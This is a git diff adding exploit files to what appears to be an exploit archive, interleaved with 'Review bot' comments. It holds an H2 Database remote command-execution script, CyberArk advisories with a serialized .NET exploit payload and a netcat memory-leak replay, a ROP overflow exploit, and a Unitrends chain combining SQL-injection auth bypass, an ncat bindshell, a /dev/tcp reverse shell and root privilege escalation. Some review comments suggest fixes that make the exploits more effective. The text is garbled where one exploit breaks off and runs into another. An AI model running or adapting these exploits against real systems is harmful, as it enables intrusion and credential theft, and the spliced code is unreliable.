diff --git a/exploits/java/local/44422.py b/exploits/java/local/44422.py new file mode 100755 index 000000000..7deae07b5 --- /dev/null +++ b/exploits/java/local/44422.py @@ -0,0 +1,92 @@ +''' +Exploit Title: H2 Database Alias Abuse +Date: 05/04/2018 +Exploit Author: gambler +Vendor Homepage:www.h2database.com +Software Link: http://www.h2database.com/html/download.html +Version: all versions +Tested on: Linux, Mac OS +''' + +import sys +import argparse +import html +import requests + +# Blogpost about it +# https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html + +def getCookie(host): + url = 'http://{}'.format(host) + r = requests.get(url) + path = r.text.split('href = ')[1].split(';')[0].replace("'","").replace('.jsp','.do') + return '{}/{}'.format(url,path) + +def login(url,user,passwd,database): + data = {'language':'en','setting':'Generic+H2+(Embedded)','name':'Generic+H2+(Embedded)','driver':'org.h2.Driver','url':database,'user':user,'password':passwd} + r = requests.post(url,data=data) + if 'Login' in r.text: + return False + return True + +def prepare(url): + cmd = '''CREATE ALIAS EXECVE AS $$ String execve(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A"); return s.hasNext() ? s.next() : ""; }$$;''' + url = url.replace('login','query') + r = requests.post(url,data={'sql':cmd}) + if not 'Syntax error' in r.text: + return url + return False + +def execve(url,cmd): + r = requests.post(url,data={'sql':"CALL EXECVE('{}')".format(cmd)}) + try: + print(html.unescape(r.text.split('')[1].split('')[0].replace('
','\n').replace(' ',' ')).encode('utf-8').decode('utf-8','ignore')) + except Exception as e: + print('Something goes wrong') + print(e) + +if __name__ == "__main__": + parser = argparse.ArgumentParser() + required = parser.add_argument_group('required arguments') + required.add_argument("-H", + "--host", + metavar='127.0.0.1:4336', + help="Specify a host", + required=True) + required.add_argument("-d", + "--database-url", + metavar='jdbc:h2~/test', + default="jdbc:h2~/test", + help="Database URL", + required=False) + required.add_argument("-u", + "--user", + metavar='username', + default="sa", + help="Username to log on H2 Database, default sa", + required=False) + required.add_argument("-p", + "--password", + metavar='password', + default="", + help="Password to log on H2 Database, default None", + required=False) + args = parser.parse_args() + +url = getCookie(args.host) +if login(url,args.user,args.password,args.database_url): + url = prepare(url) + if url: + while 1: + try: + cmd = input('cmdline@ ') + execve(url,cmd) + except KeyboardInterrupt: + print("\nProfessores ensinam, nadadores Nadam e Hackers Hackeiam") + sys.exit(0) + else: + print('ERROR - Inserting Payload') + print("Something goes wrong, exiting...") +else: + print("ERROR - Auth") + print("Something goes wrong, exiting...") \ No newline at end of file diff --git a/exploits/json/webapps/44429.txt b/exploits/json/webapps/44429.txt new file mode 100644 index 000000000..9ce6b6f38 --- /dev/null +++ b/exploits/json/webapps/44429.txt 
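Review bot: `execve()` interpolates the operator's command straight into `"CALL EXECVE('{}')"`, so any single quote in the command truncates the SQL statement and there is no way to pass a quoted argument such as `sh -c 'id; ls /root'`; double the quotes first, `"CALL EXECVE('{}')".format(cmd.replace("'", "''"))`. The alias body calls `Runtime.getRuntime().exec(cmd)` with a single string, which Java tokenises on whitespace and runs without a shell, so pipes, redirects and `&&` do nothing unless the command is wrapped in `sh -c`, and only stdout is captured (stderr is dropped). `prepare()` treats any response that does not contain the text `Syntax error` as success, so a request that landed on the wrong page or hit a permission error still drops the script into the command loop. The `r.text.split('')` separators in `execve()` would raise `ValueError: empty separator` as written and look like HTML tags lost in this copy; they should be restored from the H2 console markup before the script is relied on.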
@@ -0,0 +1,220 @@
+Advisory: CyberArk Password Vault Web Access Remote Code Execution
+
+The CyberArk Password Vault Web Access application uses authentication
+tokens which consist of serialized .NET objects. By crafting manipulated
+tokens, attackers are able to gain unauthenticated remote code execution
+on the web server.
+
+
+Details
+=======
+
+Product: CyberArk Password Vault Web Access
+Affected Versions: < 9.9.5, < 9.10, 10.1
+Fixed Versions: 9.9.5, 9.10, 10.2
+Vulnerability Type: Remote Code Execution
+Security Risk: high
+Vendor URL: https://www.cyberark.com/
+Vendor Status: fixed version released
+Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-014
+Advisory Status: published
+CVE: CVE-2018-9843
+CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9843
+
+
+Introduction
+============
+
+"CyberArk Enterprise Password Vault is designed to secure, rotate and
+control access to privileged account credentials based on organizational
+policies. A flexible architecture allows organizations to start small
+and scale to the largest, most complex IT environments. The solution
+protects privileged account credentials used to access the vast majority
+of systems."
+(from the Enterprise Password Vault Data Sheet [1])
+
+
+More Details
+============
+
+The CyberArk Password Vault provides secure storage for credentials. It
+may be accessed through various clients which are also provided by
+CyberArk. One such client is the CyberArk Password Vault Web Access, a
+.NET web application. After logging into the web application with their
+credentials, users may access credentials kept in the vault.
+Additionally, CyberArk Password Vault Web Access provides a REST API for
+programmatic access to the vault. This API is available at an URL
+similar to the following:
+
+https://10.0.0.6/PasswordVault/WebServices/
+
+The API provides multiple endpoints with different methods.
+Most methods provided by the API require prior authentication.
+Consequently, a user's API call must include an authentication token in +an HTTP authorization header. Tokens may be generated by calling a +dedicated "Logon" API method. + +Analysis of this token by RedTeam Pentesting revealed, that it consists +of a base64 encoded, serialized .NET object of the type +"CyberArk.Services.Web.SessionIdentifiers". This class consists of four +string attributes which hold information about a user's session. The +integrity of the serialized data is not protected. Therefore, attackers +may send arbitrary .NET objects to the API in the authorization header. +By leveraging certain gadgets, such as the ones provided by +ysoserial.net [2], attackers may execute arbitrary code in the context +of the web application. + + +Proof of Concept +================ + +First, a malicious serialized .NET object is created. Here the +"TypeConfuseDelegate" gadget of ysoserial.net is used to execute the +"ping" command: + +------------------------------------------------------------------------ +$ ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -o base64 \ + -c "ping 10.0.0.19" > execute-ping.txt + +$ cat execute-ping.txt +AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVy +ZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3Rl +bS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2Nv +cmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2Vu +PWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwAD +AAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtb +U3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0 +cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIA +AAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29t +cGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3Vs +dHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19j 
+b21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAA +AAIAAAAGBgAAABEvYyBwaW5nIDEwLjAuMC4xOQYHAAAAA2NtZAQFAAAAIlN5c3RlbS5EZWxl +Z2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIDAAAACERlbGVnYXRlB21ldGhvZDAHbWV0aG9kMQMD +AzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkvU3lz +dGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIvU3lzdGVtLlJl +ZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJCAAAAAkJAAAACQoAAAAE +CAAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkH +AAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBl +TmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl +cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYLAAAAsAJTeXN0ZW0uRnVuY2AzW1tT +eXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRy +YWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uU3RyaW5nLCBt +c2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRv +a2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcywgU3lz +dGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49 +Yjc3YTVjNTYxOTM0ZTA4OV1dBgwAAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3Vs +dHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5CgYNAAAASVN5 +c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2Vu +PWI3N2E1YzU2MTkzNGUwODkGDgAAABpTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcwYPAAAA +BVN0YXJ0CRAAAAAECQAAAC9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXph +dGlvbkhvbGRlcgcAAAAETmFtZQxBc3NlbWJseU5hbWUJQ2xhc3NOYW1lCVNpZ25hdHVyZQpT +aWduYXR1cmUyCk1lbWJlclR5cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEBAAMIDVN5c3RlbS5U +eXBlW10JDwAAAAkNAAAACQ4AAAAGFAAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBT +dGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYVAAAAPlN5c3RlbS5EaWFnbm9z +dGljcy5Qcm9jZXNzIFN0YXJ0KFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAAAAAoB +CgAAAAkAAAAGFgAAAAdDb21wYXJlCQwAAAAGGAAAAA1TeXN0ZW0uU3RyaW5nBhkAAAArSW50 +MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYaAAAAMlN5c3RlbS5J 
+bnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAAAAAoBEAAAAAgA +AAAGGwAAAHFTeXN0ZW0uQ29tcGFyaXNvbmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwg +VmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1 +YzU2MTkzNGUwODldXQkMAAAACgkMAAAACRgAAAAJFgAAAAoL +------------------------------------------------------------------------ + +Next, an API call is invoked which includes the malicious .NET object in +its authorization header. This is done with cURL [3] as follows: + +------------------------------------------------------------------------ +$ curl -s -X GET -k \ + --url 'https://10.0.0.6/PasswordVault/WebServices/PIMServices.svc/'\ + 'Applications/?Location=\&IncludeSublocations=true' \ + --header "authorization: $(cat execute-ping.txt)" \ + --header 'content-type: application/json' +------------------------------------------------------------------------ + +Simultaneously, tcpdump [4] is invoked on the host 10.0.0.19 to listen +for ICMP packets originating from the web server: + +------------------------------------------------------------------------ +$ sudo tcpdump -i enp0s25 icmp +tcpdump: verbose output suppressed[...] +listening on enp0s25[...] + +IP 10.0.0.6 > 10.0.0.19: ICMP echo request, id 1, seq 6, length 40 +IP 10.0.0.19 > 10.0.0.6: ICMP echo reply, id 1, seq 6, length 40 +------------------------------------------------------------------------ + +The fact that ICMP packets are received from the web server, indicates +that attacker-controlled code was executed. + + +Workaround +========== + +Disable any access to the API at the route /PasswordVault/WebServices. + + +Fix +=== + +Upgrade CyberArk Password Vault Web Access to version 9.9.5, 9.10 or +10.2. + + +Security Risk +============= + +The risk of this vulnerability is rated as high. Attackers with access +to the PrivateArk Vault Web Access REST API may execute arbitrary code +on the web server. No credentials are required. 
Attackers gain access to +the system with the privileges of the web application. Consequently, +such access may be used to backdoor the web application and compromise +further accounts and credentials. Additionally, attackers may pivot from +the web server to attack the vault directly. + + +Timeline +======== + +2017-11-24 Vulnerability identified +2018-01-22 Customer approved disclosure to vendor +2018-02-05 Vendor notified +2018-02-28 Vendor released fixed version +2018-04-06 CVE number requested +2018-04-07 CVE number assigned +2018-04-09 Advisory released + + +References +========== + +[1] http://lp.cyberark.com/rs/316-CZP-275/images/ds-enterprise-password-vault-11-15-17.pdf +[2] https://github.com/pwntester/ysoserial.net +[3] https://curl.haxx.se/ +[4] https://www.tcpdump.org/ + + +RedTeam Pentesting GmbH +======================= + +RedTeam Pentesting offers individual penetration tests performed by a +team of specialised IT-security experts. Hereby, security weaknesses in +company networks or products are uncovered and can be fixed immediately. + +As there are only few experts in this field, RedTeam Pentesting wants to +share its knowledge and enhance the public knowledge with research in +security-related areas. The results are made available as public +security advisories. + +More information about RedTeam Pentesting can be found at: +https://www.redteam-pentesting.de/ + + +Working at RedTeam Pentesting +============================= + +RedTeam Pentesting is looking for penetration testers to join our team +in Aachen, Germany. If you are interested please visit: +https://www.redteam-pentesting.de/jobs/ + +-- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen \ No newline at end of file 
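Review bot: In the cURL proof of concept the `\&` sits inside single quotes, where a backslash is literal, so the request actually sent contains `Location=\&IncludeSublocations=true`; the intended query string is `'Applications/?Location=&IncludeSublocations=true'` with no backslash, since the quotes already protect the ampersand. For defenders, the header value is a bare base64 BinaryFormatter stream, and the payload above decodes to gadget type names such as `System.DelegateSerializationHolder` and `System.Diagnostics.Process`, whereas a legitimate token should only serialize the four-string `SessionIdentifiers` object; matching those names in the decoded `authorization` header is a practical detection rule while the fix is rolled out. The Fix section names versions only; it would help readers to state the root-cause remedy, namely an integrity-protected (signed) or opaque session token instead of a deserialized client-supplied object.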
diff --git a/exploits/linux/dos/44428.txt b/exploits/linux/dos/44428.txt
new file mode 100644
index 000000000..9d4acc131
--- /dev/null
+++ b/exploits/linux/dos/44428.txt
@@ -0,0 +1,180 @@
+Advisory: CyberArk Password Vault Memory Disclosure
+
+Data in the CyberArk Password Vault may be accessed through a proprietary
+network protocol. While answering to a client's logon request, the vault
+discloses around 50 bytes of its memory to the client.
+
+
+Details
+=======
+
+Product: CyberArk Password Vault
+Affected Versions: < 9.7, < 10
+Fixed Versions: 9.7, 10
+Vulnerability Type: Information Disclosure
+Security Risk: high
+Vendor URL: https://www.cyberark.com/
+Vendor Status: fixed version released
+Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-015
+Advisory Status: published
+CVE: CVE-2018-9842
+CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9842
+
+
+Introduction
+============
+
+"CyberArk Enterprise Password Vault is designed to secure, rotate and
+control access to privileged account credentials based on organizational
+policies. A flexible architecture allows organizations to start small
+and scale to the largest, most complex IT environments. The solution
+protects privileged account credentials used to access the vast majority
+of systems."
+(from the Enterprise Password Vault Data Sheet [1])
+
+
+More Details
+============
+
+The CyberArk Password Vault serves as a database to securely store
+credentials. Furthermore, the vault enforces access controls and logs
+access to its records. Data stored in the vault may be accessed through
+a proprietary network protocol which is usually transmitted over TCP
+port 1858. Various clients, such as web applications or command line
+tools, are provided by CyberArk to interface with a vault.
+
+The first message a client sends to the vault is a "Logon" command.
+Using a network sniffer, such a message was captured:
+
+$ xxd logon.bin
+00000000: ffff ffff f700 0000 ffff ffff 3d01 0000 ............=...
+00000010: 5061 636c 6953 6372 6970 7455 7365 7200 PacliScriptUser.
+00000020: 0000 0000 0000 0000 0000 0000 0000 0000 ................
+00000030: 0000 0000 0000 0000 0000 0000 0000 0000 ................ +00000040: 0000 0000 0000 0000 0000 0000 0000 0000 ................ +00000050: 0000 0000 0000 0000 0000 0000 0000 0000 ................ +00000060: 0000 0000 0000 0000 0000 0000 0020 2020 ............. +00000070: 20ff ffff ff00 0000 0000 0000 0000 0073 ..............s +00000080: 0000 00ce cece ce00 0000 0000 0000 0000 ................ +00000090: 0000 0000 0000 0030 3d4c 6f67 6f6e fd31 .......0=Logon.1 +000000a0: 3135 3d37 2e32 302e 3930 2e32 38fd 3639 15=7.20.90.28.69 +000000b0: 3d50 fd31 3136 3d30 fd31 3030 3dfd 3231 =P.116=0.100=.21 +000000c0: 373d 59fd 3231 383d 5041 434c 49fd 3231 7=Y.218=PACLI.21 +000000d0: 393d fd33 3137 3d30 fd33 3537 3d30 fd32 9=.317=0.357=0.2 +000000e0: 323d 5061 636c 6953 6372 6970 7455 7365 2=PacliScriptUse +000000f0: 72fd 3336 373d 3330 fd00 00 r.367=30... + +Starting at offset 0x97, a type of remote procedure call can be +identified. In this case, "Logon" is invoked for the user +"PacliScriptUser". This message does not contain any random, +unpredictable data. Therefore, it may be replayed at will once captured. +This can be accomplished using netcat: + +------------------------------------------------------------------------ +$ cat logon.bin | nc -v 10.0.0.5 1858 +------------------------------------------------------------------------ + +RedTeam Pentesting discovered that the message sent by the vault in +response to a "Logon" command contains about 50 bytes of the vault's +memory. + + +Proof of Concept +================ + +To trigger the vulnerability, a previously captured logon message is +sent to the vault using netcat: + +------------------------------------------------------------------------ +$ cat logon.bin | nc -v 10.0.0.5 1858 | xxd +Ncat: Version 7.40 ( https://nmap.org/ncat ) +Ncat: Connected to 10.0.0.5:1858. +Ncat: 251 bytes sent, 273 bytes received in 0.01 seconds. 
+00000000: e500 0000 0000 0000 3001 0000 5061 636c ........0...Pacl +00000010: 6953 6372 6970 7455 7365 7200 0000 0000 iScriptUser..... +00000020: 0000 0000 0000 0000 0000 0000 0000 0000 ................ +00000030: 0000 0000 0000 0000 0000 0000 0000 0000 ................ +00000040: 0000 0000 0000 0000 0000 0000 0000 0000 ................ +00000050: 0000 0000 0000 0000 0000 0000 0000 0000 ................ +00000060: 0000 0000 0000 0000 0000 0000 001e 0200 ................ +00000070: 0078 9c53 6362 0003 7616 0686 ff40 e019 .x.Scb..v....@.. +00000080: e2e8 ec6b 6069 eaaa 1052 9498 579c 985c ...k`i...R..W..\ +00000090: 9299 9fa7 e093 9f0e 248b b333 0b0a 5253 ........$..3..RS +000000a0: 14d2 f28b 144a 8b53 8b14 0212 9373 3283 .....J.S.....s2. +000000b0: 938b 320b 4a42 817c 3d85 a0d4 c4e2 fc3c ..2.JB.|=......< +000000c0: 2b05 a070 6a5e 8942 717e 7276 6a89 4266 +..pj^.Bq~rvj.Bf +000000d0: 3150 20bf 3835 458f 8b61 140c 15c0 08c4 1P .85E..a...... +000000e0: 0063 0e25 c06d 6265 7220 3d20 7661 756c .c.%.mber = vaul +000000f0: 745f 6669 6c65 5f63 6174 6567 6f72 6965 t_file_categorie +00000100: 735f 7265 636f 7264 7300 2968 b8fb aae9 s_records.)h.... +00000110: 62 +------------------------------------------------------------------------ + +Starting at offset 0xe0, the vault discloses a total of 49 bytes of its +memory to the client. + + +Workaround +========== + +None + + +Fix +=== + +Upgrade CyberArk Password Vault to version 9.7 or 10. + + +Security Risk +============= + +This vulnerability is rated as a high risk. Exploitation only requires +network access to a PrivateArk Password Vault. Although each request +only discloses about 50 bytes of memory, sustained exploitation will +likely reveal sensitive information at some point in time. This +critically undermines the primary purpose of the PrivateArk Password +Vault. 
+ + +Timeline +======== + +2017-11-24 Vulnerability identified +2018-01-22 Customer approved disclosure to vendor +2018-02-05 Vendor notified +2018-04-06 CVE number requested +2018-04-07 CVE number assigned +2018-04-09 Advisory released + + +References +========== + +[1] http://lp.cyberark.com/rs/316-CZP-275/images/ds-enterprise-password-vault-11-15-17.pdf + + +RedTeam Pentesting GmbH +======================= + +RedTeam Pentesting offers individual penetration tests performed by a +team of specialised IT-security experts. Hereby, security weaknesses in +company networks or products are uncovered and can be fixed immediately. + +As there are only few experts in this field, RedTeam Pentesting wants to +share its knowledge and enhance the public knowledge with research in +security-related areas. The results are made available as public +security advisories. + +More information about RedTeam Pentesting can be found at: +https://www.redteam-pentesting.de/ + + +Working at RedTeam Pentesting +============================= + +RedTeam Pentesting is looking for penetration testers to join our team +in Aachen, Germany. If you are interested please visit: +https://www.redteam-pentesting.de/jobs/ + +-- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen \ No newline at end of file diff --git a/exploits/linux/local/44426.py b/exploits/linux/local/44426.py new file mode 100755 index 000000000..67e125ee8 --- /dev/null +++ b/exploits/linux/local/44426.py 
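Review bot: The Timeline has no entry for the vendor releasing a fix, although the header states `Vendor Status: fixed version released` and `Fixed Versions: 9.7, 10`; the sibling advisory for the Web Access (rt-sa-2017-014) records that date, so either a `Vendor released fixed version` line is missing here or the header should be qualified. `Workaround: None` is stronger than the facts support: the PoC needs only a replayed Logon message on TCP/1858, so restricting that port to the known client hosts and alerting on Logon attempts from any other source is an obvious compensating control until the upgrade. The file is committed under `exploits/linux/dos/` while the advisory itself classifies the issue as Information Disclosure, which will mislead anyone filtering by category.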
@@ -0,0 +1,123 @@
+# Exploit Author: Juan Sacco - http://exploitpack.com
+#
+# Tested on: Kali i686 GNU/Linux
+#
+# Description: PMS 0.42 is prone to a local unauthenticated stack-based overflow
+# The vulnerability is due to an unproper filter of user supplied input while reading
+# the configuration file and parsing the malicious crafted values.
+#
+# 0004| 0xbfffe6c4 --> 0x445b91 (": could not open file.\n")
+# 0008| 0xbfffe6c8 --> 0xbfffe720 ("Didn't find configuration file ", 'A' ...)
+# 0012| 0xbfffe6cc --> 0xbfffe6f8 --> 0x736e6f00 ('')
+#
+# Program: PMS 0.42 Practical Music Search, an MPD client
+# PMS is an ncurses based client for Music Player Daemon.
+# Vendor homepage: https://pms.sourceforge.net
+# Kali Filename: pool/main/p/pms/pms_0.42-1+b2_i386.deb
+#
+# CANARY : disabled
+# FORTIFY : disabled
+# NX : ENABLED
+# PIE : disabled
+# RELRO : Partial
+#
+#0000| 0xbfffe6c0 --> 0x4592a0 --> 0x45f870 --> 0x4
+#0004| 0xbfffe6c4 --> 0x445b91 (": could not open file.\n")
+#0008| 0xbfffe6c8 --> 0xbfffe720 ("Didn't find configuration file ", 'A' ...)
+#0012| 0xbfffe6cc --> 0xbfffe6f8 --> 0x736e6f00 ('')
+#0016| 0xbfffe6d0 --> 0x4637ef ("german")
+#0020| 0xbfffe6d4 --> 0x4637f6 ("de_DE.ISO-8859-1")
+#0024| 0xbfffe6d8 --> 0x46adb0 ("AAAA\240\312F")
+#0028| 0xbfffe6dc ("2018-04-04 06:57:58")
+#Legend: code, data, rodata, value
+#Stopped reason: SIGSEGV
+#0x0042f6c6 in Pms::log (this=, verbosity=, code=0x41414141, format=) at src/pms.cpp:982
+#982 if (!disp && verbosity < MSG_DEBUG)
+#gdb-peda$ backtrace
+#0 0x0042f6c6 in Pms::log (this=, verbosity=, code=0x41414141, format=) at src/pms.cpp:982
+#1 0x41414141 in ??
() + +import os, subprocess +from struct import pack + +# rop execve ( bin/sh ) +rop = "A"*1017 # junk +rop += pack(' -c 'touch /tmp/foooooooooooo'" + +parser = OptionParser(usage=usage) +parser.add_option("-r", '--RHOST', dest='rhost', action="store", + help="Target host w/ UNITRENDS UEB installation") +parser.add_option("-l", '--LHOST', dest='lhost', action="store", + help="Host listening for reverse shell connection") +parser.add_option("-p", '--LPORT', dest='lport', action="store", + help="Port on which nc is listening") +parser.add_option("-c", '--cmd', dest='cmd', action="store", + help="Run a custom command, no reverse shell for you.") + +(options, args) = parser.parse_args() + +if options.cmd: + if (options.lhost or options.lport): + parser.error("[!] Options --cmd and [--LHOST||--LPORT] are mututally exclusive.\n") + + elif not options.rhost: + parser.error("[!] No remote host specified.\n") + +elif options.rhost is None or options.lhost is None or options.lport is None: + parser.print_help() + sys.exit(1) + +RHOST = options.rhost +LHOST = options.lhost +LPORT = options.lport +if options.cmd: + cmd = options.cmd +else: + cmd = 'bash -i >& /dev/tcp/{0}/{1} 0>&1 &'.format(LHOST, LPORT) + +apache_ncat_port = random.randint(4000,5000) + +############################################################################### +# STAGE 1: LOW PRIVE RCE! +# Bypass authentication and run a command as apache. In this case, +# we'll run a netcat bindshell on a random port... +# ncat -lvp 4444 -e /bin/sh +# NB: This is not the part of the process where we're going to run our command. +# We're establishing a reverse shell which will be used later to state a +# privilege escalation payload onto this box. +############################################################################### + +low_priv_cmd = "ncat -lvp {0} -e /bin/sh &".format(str(apache_ncat_port)) +url = '/api/hosts/' + +# Here, a SQLi string overrides the uuid, providing auth bypass. 
+# We'll need to base64 encode before sending... +auth = base64.b64encode("v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0") + +params = urllib.urlencode({'auth' : auth}) + +params = """{{"name":"bbb","ip":"10.0.0.200'\\"`0&{0}`'"}}""".format(low_priv_cmd) + +headers = {'Host' : RHOST, + 'Content-Type' : 'application/json', + 'X-Requested-With' : 'XMLHttpRequest', + 'AuthToken' : auth } + +# Establish an HTTPS connection and send the payload. +conn = httplib.HTTPSConnection(RHOST, 443) +conn.set_debuglevel(0) + +print "[+] Sending payload to remote host [https://{0}]".format(RHOST) +print "[+] opening low-priv bindshell w/ the following command:" +print "[+] {0}".format(low_priv_cmd) + +conn.request("POST", url, params, headers=headers) +r1 = conn.getresponse() + +r1.close() + +############################################################################### +# STAGE 2: MOVE THE PRIVESC ONTO THE REMOTE BOX! +# The local root RCE exploit below will be printf'd into a file in /tmp +# NB: your command of choice has been inserted into this exploit. 
+############################################################################### + +priv_esc_text = """ + +import socket +import binascii +import struct +import time +import sys +from optparse import OptionParser + +# Parse command line args: +usage = "Usage: %prog -c 'touch /tmp/foooooooooooo'" + +parser = OptionParser(usage=usage) +parser.add_option("-c", '--cmd', dest='cmd', action="store", + help="Run a custom command, no reverse shell for you.") +parser.add_option("-x", '--xinetd', dest='xinetd', action="store", + type="int", default=1743, + help="port on which xinetd is running (default: 1743)") + +(options, args) = parser.parse_args() + +RHOST = '127.0.0.1' +XINETDPORT = options.xinetd +cmd = options.cmd + +def recv_timeout(the_socket,timeout=2): + the_socket.setblocking(0) + total_data=[];data='';begin=time.time() + while 1: + #if you got some data, then break after wait sec + if total_data and time.time()-begin>timeout: + break + #if you got no data at all, wait a little longer + elif time.time()-begin>timeout*2: + break + try: + data=the_socket.recv(8192) + if data: + total_data.append(data) + begin=time.time() + else: + time.sleep(0.1) + except: + pass + return ''.join(total_data) + +print "[+] attempting to connect to xinetd on {0}:{1}".format(RHOST, str(XINETDPORT)) + +try: + s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s1.connect((RHOST,XINETDPORT)) +except: + print "[!] Failed to connect!" + exit() + +data = s1.recv(4096) +bpd_port = int(data[-8:-3]) + +try: + pass + s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s2.connect((RHOST, bpd_port)) +except: + print "[!] Failed to connect!" + s1.close() + exit() + +print "[+] Connected! 
Sending the following cmd to {0}:{1}".format(RHOST,str(XINETDPORT)) +print "[+] '{0}'".format(cmd) + +cmd_len = chr(len(cmd) + 3) +packet_len = chr(len(cmd) + 23) + +packet = '\\xa5\\x52\\x00\\x2d' +packet += '\\x00' * 3 +packet += packet_len +packet += '\\x00' * 3 +packet += '\\x01' +packet += '\\x00' * 3 +packet += '\\x4c' +packet += '\\x00' * 3 +packet += cmd_len +packet += cmd +packet += '\\x00' * 3 + +s1.send(packet) + +data = recv_timeout(s2) + +print data + +s1.close() +#s2.close() + +""" + +s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +pe_filename = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(16)) +pe_filename += ".py" + +print "[+] Connecting to ncat bindshell at {0}:{1}.".format(RHOST, str(apache_ncat_port)) +try: + s2.connect((RHOST,apache_ncat_port)) +except Exception as e: + print "[!] something's wrong with %s:%d. Exception is %s" % (address, port, e) + exit() + +print "[+] Transfering privesc script to remote host..." +for line in priv_esc_text.split('\n'): + line = base64.b64encode(line+'\n') + ft_cmd = "echo " + line + " | base64 -d >> /tmp/{0}\n".format(pe_filename) + + s2.send(ft_cmd) + +print "[+] Executing command:" +print "[+] '{0}'".format(cmd) +high_priv_cmd = "python /tmp/{0} -c '{1}'\n".format(pe_filename, cmd) +s2.send(high_priv_cmd) +print "[+] Cleaning up, removing remote privesc script." +cleanup_cmd = "rm /tmp/{0}\n".format(pe_filename) +s2.send(cleanup_cmd) + +print "[+] We did it! :D" +s2.close() \ No newline at end of file diff --git 